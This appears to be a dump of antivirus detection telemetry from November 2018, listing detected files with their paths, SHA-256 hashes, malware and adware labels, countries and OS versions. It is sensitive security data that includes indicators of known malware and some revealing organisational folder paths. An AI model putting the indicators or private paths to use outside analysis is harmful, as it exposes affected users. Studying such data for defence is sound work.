  Row(detection=Row(filename='avscan-20181102-053837-846a1f20', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053837-846A1F20', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:38:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053050-6dcdc796', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053050-6DCDC796', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:30:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055438-c143811c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055438-C143811C', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051157-ca87017d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051157-CA87017D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:11:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055907-61761d87', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055907-61761D87', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053329-cc7c9583', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053329-CC7C9583', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:33:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055946-78bf9faa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055946-78BF9FAA', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050831-50109a61', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050831-50109A61', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:08:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053443-f8b34c30', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053443-F8B34C30', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050552-f1256a51', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050552-F1256A51', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-062204-95e5e325', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-062204-95E5E325', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:22:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055942-7655ffcf', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055942-7655FFCF', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055717-1ff0d337', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055717-1FF0D337', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:45:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055437-c0af6112', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055437-C0AF6112', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055937-731a03d8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055937-731A03D8', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:59:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050553-f16f401e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050553-F16F401E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055415-b32f4493', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055415-B32F4493', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:54:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060733-8f20ab08', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060733-8F20AB08', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:07:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T17:00:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054115-e256aca3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054115-E256ACA3', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:41:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061511-9ff89039', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061511-9FF89039', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:15:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052510-a325250e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052510-A325250E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:25:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060648-73fcccfb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-060648-73FCCCFB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:06:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050551-f07dbf2e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050551-F07DBF2E', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:05:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055704-17d01999', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055704-17D01999', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:57:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-095050-8e040ab4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a0714c40\\AVSCAN-20181101-095038-8BB12B2D\\AVSCAN-20181101-095050-8E040AB4', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='BD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:51:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='oci7wu7pmsw.dll', filepath='\\?\\C:\\Windows\\ocI7wu7PmSW.dll', filesize=192000, name='Adware/ELEX.xjuch.#M1.#R1'), hash='50450cd74f7e00ab23864f3a22f66217446dc76563594c16209c7d84999ca55d', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:50:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwhddb9', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWHDDB9', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:41:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T12:42:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155159-99310acd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155159-99310ACD', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:52:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-01-08-43-08.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-30T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-01T04:03:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dwh5702.exe', filepath='C:\\ProgramData\\Symantec\\DefWatch.DWH\\DWH5702.exe', filesize=1536000, name='TR/Crypt.XPACK.Gen.#M300.#R3060'), hash='4fe2744e570d5be6bfc798d8f45f02a7f5414a9f0328369ee7be5e7d675ff232', metadata=Row(cmdline='\\\\\\/s \\\\\\"Symantec Endpoint Protection\\\\\\" \\\\\\/m \\\\\\"C:\\\\\\\\Program Files\\\\\\\\Symantec\\\\\\\\Symantec Endpoint Protection\\\\\\\\12.1.4100.4126.105\\\\\\\\Bin\\\\\\\\sms.dll\\\\\\" \\\\\\/prefetch:1', country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Symantec\\Symantec Endpoint Protection\\12.1.4100.4126.105\\Bin\\ccSvcHst.exe', parentsize=144496, timestamp='2018-11-01T09:33:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:31:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='srv64', filepath='C:\\Windows\\System32\\srv64', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T05:38:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='smp2.exe', filepath='C:\\ProgramData\\smp2.exe', filesize=512000, name='Adware/SpeedBit.3a2585.#M1.#R1'), hash='3a258512fe6ae76447e5d02fbda9411b516b70497817a46d31cbe8a1a80ab8fb', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T06:14:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181031-234534-31e7e894', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9be25e36\\AVSCAN-20181031-232508-97335948\\AVSCAN-20181031-234534-31E7E894', filesize=576000, name='Adware/DealPly.182b23.#M1.#R1'), hash='182b23d0401d9ccd8adcc7da4cf30f1d174420f216f3f3e85661ccd9b044e446', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T06:45:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='0d397b7b7ef9970978d609a0a6fc72e053c879dac5a0e7821667083c5a31e2de.vir', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\0D397B7B7EF9970978D609A0A6FC72E053C879DAC5A0E7821667083C5A31E2DE.VIR', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='0d397b7b7ef9970978d609a0a6fc72e053c879dac5a0e7821667083c5a31e2de', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:16:24Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:38:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091911-f4c8d5ab', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-091843-EFD64E6A\\AVSCAN-20181101-091911-F4C8D5AB', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:20:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pot kop.exe', filepath='D:\\DATA_SHARE\\POT KOP\\POT KOP.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:28:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='lamaran acc.scr', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2017\\RPG GARMENT 2017\\DATA ADMINISTRASI HRD\\LAMARAN ACCOUNTING\\LAMARAN ACC\\LAMARAN ACC.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:27:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='epm.exe', filepath='\\\\?\\E:\\02. Sharing Data\\Approved GRTT\\RAA\\Approved 2013\\Approved All eks\\epm.exe', filesize=26560000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='0d1edef1a6d85204125782adcaaedad471c5576efea6832875e74b4b364a9349', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T10:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-155914-e26369b0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d835568\\AVSCAN-20181101-154414-4AD76DC3\\AVSCAN-20181101-155914-E26369B0', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:59:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:10:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-113353-34f6c949', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b33d02c7\\AVSCAN-20181101-112906-89C620F7\\AVSCAN-20181101-113353-34F6C949', filesize=380000, name='PUA/MyWebSearch.Gen.#M1.#R1'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:33:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tpmagentservice.dll', filepath='C:\\Windows\\System32\\tpmagentservice.dll', filesize=576000, name='HEUR/AGEN.1033682.#M1.#R1'), hash='3be2712f73c464f000dea362560c73d29201059849979f83f557fe1fe735af50', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-01T02:00:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='bulanan.exe', filepath='D:\\DATA_SHARE\\dini\\D_Dini\\2015\\New Folder\\ALL Data LPA\\LAPORAN BULANAN\\BULANAN.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T07:24:05Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wuauserv.exe', filepath='\\\\?\\C:\\Windows\\Temp\\msohtml\\wuauserv.exe', filesize=448000, name='W32/Hlubea.Z.#M1.#R1'), hash='927986f56707e3dfe2adca5e4224417a764405e155f4ac1e60ddf7b6085c8c2c', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T04:30:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='7zfm.exe', filepath='C:\\Program Files (x86)\\7-Zip\\7zFM.exe', filesize=576000, name='W32/Sality.AT.#M1.#R1'), hash='85ad00cd2fc6ffe9eefadabab58a16008a32609818815498eb7331536c825972', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T12:05:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\nsd1822.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T22:41:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-121849-107d052f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d45ade37\\AVSCAN-20181101-121832-0DE31D88\\AVSCAN-20181101-121849-107D052F', filesize=4928000, name='TR/Agent.ugljo.#M1.#R1'), hash='6d7b13673e4f0f9804f2f521f9070816d5cccc266b8dc427137433935cfe2f27', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T15:18:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngtp.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_FARNGTP.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='7f0610e3ff3c1e082d0b9d2a2d844a1e351290ab2763e1585498df432561900c', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:25Z'), dt=datetime.date(2018, 11, 1)),
